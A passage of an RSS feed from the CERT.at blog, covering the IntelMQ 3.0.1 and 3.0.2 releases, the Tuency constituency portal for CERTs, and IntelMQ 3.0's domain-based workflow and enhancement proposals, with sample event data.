&lt;p&gt;I have &lt;a href=&quot;https://www.cert.at/de/blog/2017/8/blog-20170731130131-2076&quot;&gt;written at length on this topic&lt;/a&gt; some years ago (in German). See also &lt;a href=&quot;https://www.stiftung-nv.de/en/publication/encryption-debate-germany-2021-update&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;</description><pubDate>Tue, 16 Nov 2021 12:07:58 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/11/an-update-on-the-state-of-the-nis2-draft</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-11-16T12:07:58Z</dc:date></item><item><title>IntelMQ 3.0.2 improves the performance of high-load data collection</title><link>https://www.cert.at/en/blog/2021/9/intelmq-302-improves-the-performance-of-high-load-data-collection</link><description>&lt;p class=&quot;block&quot;&gt;Shortly after the 3.0.1 release, &lt;a title=&quot; Slow performance on latest release in Docker (#2098)&quot; href=&quot;https://github.com/certtools/intelmq/issues/2098&quot;&gt;an IntelMQ user reported&lt;/a&gt; general performance issues, which we investigated over the following days. We identified two causes for them at the heart of IntelMQ: As it turned out, they just affected the data feed-collection components &quot;collectors&quot; with high load (streaming data or just a few big reports were not a problem) or those which use threading (receiving &lt;a title=&quot;API collector&quot; href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#api&quot;&gt;API collector&lt;/a&gt; and &lt;a title=&quot;STOMP collector&quot; href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#stomp&quot;&gt;STOMP collector&lt;/a&gt;).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Due to the nature of these bugs they were imminent only in bigger and/or more complex setups. Both issues stemmed from complex overhauls in IntelMQ's core in &lt;a href=&quot;https://www.cert.at/en/news/blog/intelmq-30-domain-based-workflow-ieps&quot;&gt;IntelMQ 3.0&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The new version 3.0.2 was released last Friday, September 10th, and is available on &lt;a href=&quot;https://github.com/certtools/intelmq/releases/3.0.2&quot;&gt;GitHub&lt;/a&gt;, &lt;a href=&quot;https://pypi.org/project/intelmq/&quot;&gt;PyPI&lt;/a&gt;, in the &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/installation.html#native-packages&quot;&gt;deb/rpm repositories&lt;/a&gt; and on &lt;a href=&quot;https://hub.docker.com/r/certat/intelmq-full&quot;&gt;DockerHub&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our 2020-AT-IA-0254 project, which also support our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;&quot; width=&quot;100%&quot; /&gt;&lt;/p&gt;</description><pubDate>Mon, 13 Sep 2021 08:02:03 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/9/intelmq-302-improves-the-performance-of-high-load-data-collection</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-09-13T08:02:03Z</dc:date></item><item><title>IntelMQ 3.0.1 release</title><link>https://www.cert.at/en/blog/2021/9/intelmq-301-release</link><description>&lt;p class=&quot;block&quot;&gt;During the development of the next feature release IntelMQ 3.1.0, we corrected some issues that were found in the IntelMQ 3.0.0 release together with the IntelMQ community. We release new versions of &lt;a href=&quot;https://intelmq.readthedocs.io/&quot;&gt;IntelMQ&lt;/a&gt;, the &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/intelmq-api.html&quot;&gt;IntelMQ API&lt;/a&gt; and the graphical user-interface &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/intelmq-manager.html&quot;&gt;IntelMQ Manager&lt;/a&gt;. The upgrade-instructions can be found in the &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/upgrade.html&quot;&gt;documentation&lt;/a&gt;. An important upgrade hint is also in the &lt;a href=&quot;https://lists.cert.at/pipermail/intelmq-users/2021-September/000380.html&quot;&gt;release announcement&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h2&gt;Summary of changes&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Several fixes related to IEP01 implementation (change of the configuration file format and refactoring of internal parameter handling)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The feed &lt;em&gt;MalwareDomains&lt;/em&gt; is obsolete and was removed&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Numerous fixes to the ShadowServer-Parser, including support for these new reports:&lt;br /&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-smtp-report/&quot;&gt;Vulnerable SMTP Server&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.shadowserver.org/what-we-do/network-reporting/microsoft-sinkhole-events-report/&quot;&gt;Microsoft Sinkhole Events Report&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://www.shadowserver.org/what-we-do/network-reporting/microsoft-sinkhole-http-events-report/&quot;&gt;Microsoft Sinkhole HTTP Events Report&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.shadowserver.org/what-we-do/network-reporting/honeypot-http-scanner-events/&quot;&gt;Honeypot HTTP Scan&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Heavy refactoring of IntelMQ-Manager's JavaScript parts to fix errors and usability issues.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Various smaller fixes.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;A detailed list of all changes can be read in the release notes:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://github.com/certtools/intelmq/releases/tag/3.0.1&quot;&gt;IntelMQ 3.0.1&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://github.com/certtools/intelmq-api/releases/tag/3.0.1&quot;&gt;IntelMQ API 3.0.1&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://github.com/certtools/intelmq-manager/releases/tag/3.0.1&quot;&gt;IntelMQ Manager 3.0.1&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The full documentation can be found at &lt;a href=&quot;https://intelmq.readthedocs.io/&quot;&gt;intelmq.readthedocs.io&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h2&gt;Acknowledgements&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Thanks to all the contributors (in alphabetic order):&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;abr4xc&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Alex Kaplan&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Birger Schacht (CERT.at)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Mikk Margus M&amp;ouml;ll (CERT.ee)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Sebastian Wagner (CERT.at)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Sebastian Waldbauer (CERT.at)&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Every contribution is very appreciated. Feel free to &lt;a href=&quot;https://lists.cert.at/cgi-bin/mailman/listinfo/intelmq-users&quot;&gt;ask questions&lt;/a&gt;, &lt;a href=&quot;https://github.com/certtools/intelmq/issues/new&quot;&gt;reports issues&lt;/a&gt; or &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/dev/guide.html&quot;&gt;merge your code&lt;/a&gt; into the IntelMQ universe.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; and&amp;nbsp;2020-AT-IA-0254 projects, which also support our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Thu, 02 Sep 2021 17:17:38 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/9/intelmq-301-release</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-09-02T17:17:38Z</dc:date></item><item><title>Tuency - Constituency Portal for CERTs</title><link>https://www.cert.at/en/blog/2021/9/tuency-constituency-portal-for-iocs-and-certs</link><description>&lt;p class=&quot;block&quot;&gt;The new Constituency Portal &quot;Tuency&quot; was designed by CERT.at and the development has been delegated to the software development company &lt;a href=&quot;https://intevation.de&quot; target=&quot;_blank&quot;&gt;Intevation&lt;/a&gt;. Tuency's web portal allows you to manage your constituency members who then can manage their relevant data themselves. This is important, for example, if IP subnets or email addresses change.&lt;/p&gt;&#13;
&lt;h2&gt;Highlights&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In order to be future-proof and use production-ready software, Tuency ships with field-tested components.&lt;/p&gt;&#13;
&lt;table style=&quot;height: 210px;&quot; width=&quot;900&quot;&gt;&#13;
&lt;thead&gt;&#13;
&lt;tr style=&quot;height: 16px;&quot;&gt;&#13;
&lt;th style=&quot;height: 16px; width: 165.367px;&quot;&gt;Name&lt;/th&gt;&#13;
&lt;th style=&quot;height: 16px; width: 733.633px;&quot;&gt;Description&lt;/th&gt;&#13;
&lt;/tr&gt;&#13;
&lt;/thead&gt;&#13;
&lt;tbody&gt;&#13;
&lt;tr style=&quot;height: 16px;&quot;&gt;&#13;
&lt;td style=&quot;height: 16px; width: 165.367px;&quot;&gt;&lt;a href=&quot;https://laravel.com/docs/master/&quot; target=&quot;_blank&quot;&gt;Laravel&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td style=&quot;height: 16px; width: 733.633px;&quot;&gt;Used as PHP Framework&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr style=&quot;height: 16px;&quot;&gt;&#13;
&lt;td style=&quot;height: 16px; width: 165.367px;&quot;&gt;&lt;a href=&quot;https://getcomposer.org/&quot; target=&quot;_blank&quot;&gt;Composer&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td style=&quot;height: 16px; width: 733.633px;&quot;&gt;Used as PHP package manager&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr style=&quot;height: 16px;&quot;&gt;&#13;
&lt;td style=&quot;height: 16px; width: 165.367px;&quot;&gt;&lt;a href=&quot;https://vuejs.org/&quot; target=&quot;_blank&quot;&gt;Vue.JS&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td style=&quot;height: 16px; width: 733.633px;&quot;&gt;Used for a single-page-application (SPA) frontend, yarn as package manager&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr style=&quot;height: 16px;&quot;&gt;&#13;
&lt;td style=&quot;height: 16px; width: 165.367px;&quot;&gt;&lt;a href=&quot;https://www.keycloak.org/&quot; target=&quot;_blank&quot;&gt;KeyCloak&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td style=&quot;height: 16px; width: 733.633px;&quot;&gt;As authentication service&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr style=&quot;height: 16.7px;&quot;&gt;&#13;
&lt;td style=&quot;height: 16.7px; width: 165.367px;&quot;&gt;&lt;a href=&quot;https://www.docker.com/&quot; target=&quot;_blank&quot;&gt;Docker (optional)&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td style=&quot;height: 16.7px; width: 733.633px;&quot;&gt;For containerized usage in your deployment&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr style=&quot;height: 16px;&quot;&gt;&#13;
&lt;td style=&quot;height: 16px; width: 165.367px;&quot;&gt;&lt;a href=&quot;https://www.postgresql.org/&quot; target=&quot;_blank&quot;&gt;PostgreSQL&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td style=&quot;height: 16px; width: 733.633px;&quot;&gt;Used as database&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;/tbody&gt;&#13;
&lt;/table&gt;&#13;
&lt;h2&gt;Customer-Relationship-Management (CRM)&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In Tuency, an organization administrator can create suborganizations, which in turn can also have their own administrator. In each organization, multiple users can be created, who can then manage the associated organization. Organizations are subject to a tree-like hierarchy.&lt;/p&gt;&#13;
&lt;h2&gt;Tagging&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Individual tags can be set for each user, user group or organisation to represent users or organisations' memberships or attributes. The export functions can filter by these tags.&lt;/p&gt;&#13;
&lt;h2&gt;Self-Management&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;An organization administrator can claim network objects, for example Domains, Sub-Domains, IP address blocks, single IP addresses or RIPE Organisation handles. The claimed network objects are displayed in a tree-like structure to show the fine granularity of the claimed blocks. For network objects rules for security incident notifications can be configured and the network object can be associated with an abuse-contact.&lt;/p&gt;&#13;
&lt;h2&gt;API&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Tuency itself offers a rich API to query the correct abuse-contact for a given network object (ASN, IP-Address, Domain) and supports hierarchical inheritance and notification rules! IntelMQ is able to communicate with the API through an expert (&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#tuency&quot; target=&quot;_blank&quot;&gt;IntelMQ&lt;/a&gt; &quot;bot&quot;).&lt;/p&gt;&#13;
&lt;h2&gt;Keycloak&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Keycloak is used as identity and access management provider. It's &lt;a href=&quot;https://www.keycloak.org/&quot; target=&quot;_blank&quot;&gt;open source&lt;/a&gt; and is widely used as a single sign-on solution. It uses standard protocols like OAuth 2.0, OpenID Connect and SAML 2.0 and also integrates with existing LDAP or Active Directory services. The Tuency source code and documentation can be found in &lt;a href=&quot;https://gitlab.com/intevation/tuency/tuency&quot; target=&quot;_blank&quot;&gt;Tuency's source-code repository&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; and&amp;nbsp;2020-AT-IA-0254 and projects, which also support our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Thu, 02 Sep 2021 10:37:18 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/9/tuency-constituency-portal-for-iocs-and-certs</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-09-02T10:37:18Z</dc:date></item><item><title>IntelMQ 3.0 - Configuration, Domain based workflow, IEPs</title><link>https://www.cert.at/en/blog/2021/8/intelmq-30-domain-based-workflow-ieps</link><description>&lt;p class=&quot;block&quot;&gt;We are happy to announce the completion of the IntelMQ 3.0 milestone. The addition of 2 developers to the IntelMQ development team in October 2020 allowed us to work on major IntelMQ 3.0 changes - new features as well as architectural changes. The most important new features are:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Domain-based workflow (Capability to use domain-based data)&lt;/li&gt;&#13;
&lt;li&gt;Simplified configuration management&lt;/li&gt;&#13;
&lt;li&gt;Easier bot development via &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/dev/guide.html#mixins&quot;&gt;&quot;Mixins&quot;&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The development was based on a thorough collection of user requirements by former CERT.at employee Aaron Kaplan. This requirements collection included personal interviews in the CERT-community, workshops at CERT-conferences as well as architectural reviews. Our previous IntelMQ release, &lt;a href=&quot;https://cert.at/en/blog/2021/3/intelmq-230-api-docker-shadowserver-reports-api-documentation&quot;&gt;IntelMQ 2.3.0&lt;/a&gt;, was an intermediate step, and brought, for example, Docker-support, the IntelMQ-API and the revised documentation page.&lt;/p&gt;&#13;
&lt;h2&gt;Domain based workflow&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The introduction of various new IntelMQ bots (also know as &quot;Experts&quot;) removed IntelMQ's previous limitation to IP address-based data. Versions prior to IntelMQ 3.0 supported almost no domain-based workflows, most operations and look-ups could only be performed with IP addresses. For example, if the domain &lt;em&gt;&quot;example.com&quot;&lt;/em&gt; was used as a command and control server, IntelMQ had to resolve example.com to an IP address and add that to the event. Any further processing was based on this IP address. To overcome this limitations, we added some new components in IntelMQ 3.0 that address the different requirements for processing domain-based data. These include:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Querying the HTTP return status of websites&lt;/li&gt;&#13;
&lt;li&gt;Examining website's content (for example to detect whether a website has been defaced)&lt;/li&gt;&#13;
&lt;li&gt;Taking a screenshot of a web page using &lt;a href=&quot;https://github.com/Lookyloo/lookyloo&quot; target=&quot;_blank&quot;&gt;LookyLoo&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;Querying contact information for a domain&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The important &quot;experts&quot; bots for domain-based workflows that where added in IntelMQ 3.0 at a glance:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#http-status&quot; target=&quot;_blank&quot;&gt;HTTP StatusCode Expert&lt;/a&gt;: Checks websites' response status code with a given value&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#http-content&quot; target=&quot;_blank&quot;&gt;HTTP Content Expert&lt;/a&gt;: Checks websites' content for a given string&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#lookyloo&quot; target=&quot;_blank&quot;&gt;LookyLoo Expert&lt;/a&gt;: Instructs a &lt;a href=&quot;https://www.lookyloo.eu/&quot;&gt;LookyLoo&lt;/a&gt;-instance to create a screenshot of the given website and adds a screenshot URL&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#rdap&quot; target=&quot;_blank&quot;&gt;RDAP Expert&lt;/a&gt;: Checks the given domain against public or user defined RDAP services.&lt;sup&gt;&lt;a id=&quot;anker1&quot; title=&quot;more details&quot; href=&quot;#an1&quot;&gt;[1]&lt;/a&gt;&lt;/sup&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#uwhoisd&quot; target=&quot;_blank&quot;&gt;uWhoisd&lt;/a&gt;: Queries a &lt;a href=&quot;https://github.com/lookyloo/uwhoisd&quot;&gt;uWhoisd WHOIS-proxy&lt;/a&gt; instance and saves the whois-response. This expert was contributed by &lt;a href=&quot;https://github.com/Rafiot&quot;&gt;Rapha&amp;euml;l Vinot&lt;/a&gt; (CIRCL).&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#trusted-introducer-lookup-expert&quot; target=&quot;_blank&quot;&gt;Trusted Introducer Lookup Expert&lt;/a&gt;: Checks which CERT is responsible for the domain in the &lt;a href=&quot;https://www.trusted-introducer.org/directory/&quot;&gt;Trusted Introducer directory&lt;/a&gt;.&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#tuency&quot; target=&quot;_blank&quot;&gt;Tuency Expert&lt;/a&gt;: Queries a &lt;a href=&quot;https://gitlab.com/intevation/tuency/tuency&quot;&gt;tuency Contact database&lt;/a&gt; to enrich the event with constituency and notification information (e.g. abuse contact for a domain) based on configured rules. A future blog post will discuss the release of Tuency in greater detail.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;For additional approaches for looking up abuse contact information, please have a look at &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/abuse-contacts.html&quot; target=&quot;_blank&quot;&gt;our guide on abuse-contact look-ups&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h2&gt;IntelMQ Enhancement Proposal (IEP)&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;An IEP is a document, like an RFC or a &lt;a href=&quot;https://www.python.org/dev/peps/&quot;&gt;PEP&lt;/a&gt; (Python Enhancement Proposal) that describes the proposed changes in detail, including examples and implications. These texts are available in a separate GitHub repository &lt;a href=&quot;https://github.com/certtools/ieps&quot;&gt;certtools/ieps&lt;/a&gt;, which can also be used to work on them collaboratively. Our idea behind introducing the IntelMQ Enhancement Proposal (IEP) process was to discuss major changes publicly to reach a consensus within the community. The discussion in the community takes place on the &lt;a href=&quot;https://lists.cert.at/cgi-bin/mailman/listinfo/intelmq-dev&quot;&gt;developer's mailinglist&lt;/a&gt;. This process allows us to collect feedback, insight and proposals from the whole community. It's up to the community to decide if a proposal can be adopted or rejected. We have published 4 IEPs so far and have two more in the pipeline:&lt;/p&gt;&#13;
&lt;table&gt;&#13;
&lt;thead&gt;&#13;
&lt;tr&gt;&#13;
&lt;th&gt;#&lt;/th&gt;&#13;
&lt;th&gt;Name&lt;/th&gt;&#13;
&lt;th&gt;Status&lt;/th&gt;&#13;
&lt;th&gt;Released in version&lt;/th&gt;&#13;
&lt;/tr&gt;&#13;
&lt;/thead&gt;&#13;
&lt;tbody&gt;&#13;
&lt;tr&gt;&#13;
&lt;td&gt;001&lt;/td&gt;&#13;
&lt;td&gt;&lt;a href=&quot;https://github.com/certtools/ieps/blob/main/001&quot; target=&quot;_blank&quot;&gt;Configuration Handling&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td&gt;&lt;a href=&quot;https://github.com/certtools/intelmq/projects/9&quot; target=&quot;_blank&quot;&gt;Implementation completed&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td&gt;3.0.0&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr&gt;&#13;
&lt;td&gt;002&lt;/td&gt;&#13;
&lt;td&gt;&lt;a href=&quot;https://github.com/certtools/ieps/blob/main/002&quot; target=&quot;_blank&quot;&gt;Mixins&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td&gt;&lt;a href=&quot;https://github.com/certtools/intelmq/projects/10&quot; target=&quot;_blank&quot;&gt;Implementation completed&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td&gt;3.0.0&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr&gt;&#13;
&lt;td&gt;003&lt;/td&gt;&#13;
&lt;td&gt;&lt;a href=&quot;https://github.com/certtools/ieps/blob/main/003&quot; target=&quot;_blank&quot;&gt;Internal Data Format: Multiple Values&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td&gt;Dismissed&lt;/td&gt;&#13;
&lt;td&gt;-&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr&gt;&#13;
&lt;td&gt;004&lt;/td&gt;&#13;
&lt;td&gt;&lt;a href=&quot;https://github.com/certtools/ieps/blob/main/004&quot; target=&quot;_blank&quot;&gt;Internal Data Format: Meta Information and Data Exchange&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td&gt;Undecided/Postponed&lt;/td&gt;&#13;
&lt;td&gt;-&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr&gt;&#13;
&lt;td&gt;005&lt;/td&gt;&#13;
&lt;td&gt;&lt;a href=&quot;https://github.com/certtools/ieps/blob/main/005&quot; target=&quot;_blank&quot;&gt;Internal Data Format: Notification settings&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td&gt;Undiscussed&lt;/td&gt;&#13;
&lt;td&gt;-&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;tr&gt;&#13;
&lt;td&gt;006&lt;/td&gt;&#13;
&lt;td&gt;&lt;a href=&quot;https://github.com/certtools/ieps/blob/main/006&quot; target=&quot;_blank&quot;&gt;Internal Data Format: Msgpack as serializer&lt;/a&gt;&lt;/td&gt;&#13;
&lt;td&gt;Undiscussed&lt;/td&gt;&#13;
&lt;td&gt;-&lt;/td&gt;&#13;
&lt;/tr&gt;&#13;
&lt;/tbody&gt;&#13;
&lt;/table&gt;&#13;
&lt;h3&gt;IEP01: Configuration&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In IntelMQ 3.0, we redesigned the configuration to simplify the maintenance of an IntelMQ instance. In the proposal &lt;a href=&quot;https://github.com/certtools/ieps/blob/main/001&quot; target=&quot;_blank&quot;&gt;IEP 001&lt;/a&gt; we described common issues with the current JSON configuration and asked the community to vote for one out of three possible new data formats. The community decided on YAML, a choice we are very happy with because we believe it offers the best usability. This change also merged three different and overlapping configuration files (&lt;em&gt;defaults.conf&lt;/em&gt;, &lt;em&gt;pipeline.conf&lt;/em&gt; and &lt;em&gt;runtime.conf&lt;/em&gt;) into one single &lt;em&gt;runtime.yaml&lt;/em&gt;. Furthermore, it is now possible to store default parameter values inside each bot programmatically, which reduces the risk for errors when new parameters are added. This eliminates the need for the &lt;em&gt;BOTS&lt;/em&gt; file, further reducing configuration complexity and development effort.&lt;/p&gt;&#13;
&lt;h3&gt;IEP02: Mixins&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/dev/guide.html#mixins&quot;&gt;Mixins&lt;/a&gt; are a new component in IntelMQ to simplify the creation of new bots, by allowing the developer to use already existing templates to cover common tasks, such as Caches/States and HTTP Sessions.&lt;/p&gt;&#13;
&lt;h3&gt;IEP03: Multiple Values in the data format&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In IntelMQ's Internal Data Format (&quot;IDF&quot;), one field can have only one value, for example a single IP address or domain. However, in practice an IoC (&lt;em&gt;Indicator of Compromse&lt;/em&gt;) may consist of multiple fields, e.g. a domain could map to multiple IP addresses. Allowing multiple values - as specified by IEP03 - would address this issue. An alternative approach would be linking events by unique identifiers as specified in IEP04 (see below). IEP03 and IEP04 are mutually exclusive.&lt;/p&gt;&#13;
&lt;h4&gt;Data example without Multiple Values&lt;/h4&gt;&#13;
&lt;pre&gt;  {&#13;
  &quot;source.ip&quot;: &quot;192.168.0.1&quot;,&#13;
  &quot;source.observation&quot;: &quot;2021-07-22T11:12:52+00:00Z&quot;,&#13;
  &quot;extra.tags&quot;: &quot;http-exploit&quot;,&#13;
  }&#13;
&lt;/pre&gt;&#13;
&lt;h4&gt;Data example with Multiple Values&lt;/h4&gt;&#13;
&lt;pre&gt;  {&#13;
  &quot;source.ip&quot;: [&quot;192.168.0.1&quot;, &quot;192.168.2.1&quot;],&#13;
  &quot;source.observation&quot;: &quot;2021-07-22T11:12:52+00:00&quot;,&#13;
  &quot;extra.tags&quot;: [&quot;http-exploit&quot;, &quot;ddos-amplification&quot;],&#13;
  }&#13;
&lt;/pre&gt;&#13;
&lt;h3&gt;IEP04: Meta Information and Data Exchange&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Meta Information provides context to IoCs and is useful when exchanging data across IntelMQ instances or visualizing event relationships. Based on previous work by the community and our own research, we proposed a possible solution in March 2021. The proposal included a detailed analysis of the problem, use-cases and an implementation suggestion. The community welcomed the proposal, but did not reach a consensus on the exact specification. IEP03 and IEP04 were also the topic of the first - virtual - IntelMQ Hackathon which took place on 22nd April 2021. The discussion of the proposal is still ongoing and a conclusion has not been reached yet. The biggest concern within the community is, that IEP04 would add a lot of complexity and would be considered a breaking change.&lt;/p&gt;&#13;
&lt;h4&gt;Example&lt;/h4&gt;&#13;
&lt;pre&gt;{&#13;
  &quot;__meta&quot;: {&#13;
    &quot;UUID&quot;: &quot;1ea60f56-b67b-61fc-829a-0242ac130003&quot;,&#13;
    &quot;Version&quot;: 1,&#13;
  },&#13;
  events: [&#13;
    {&#13;
      &quot;source.ip&quot;: &quot;192.168.0.1/32&quot;,&#13;
      &quot;source.observation&quot;: &quot;2021-07-22T11:12:52+00:00&quot;,&#13;
    }&#13;
  ]&#13;
}&#13;
&lt;/pre&gt;&#13;
&lt;h3&gt;Various other new bots and improvements&lt;/h3&gt;&#13;
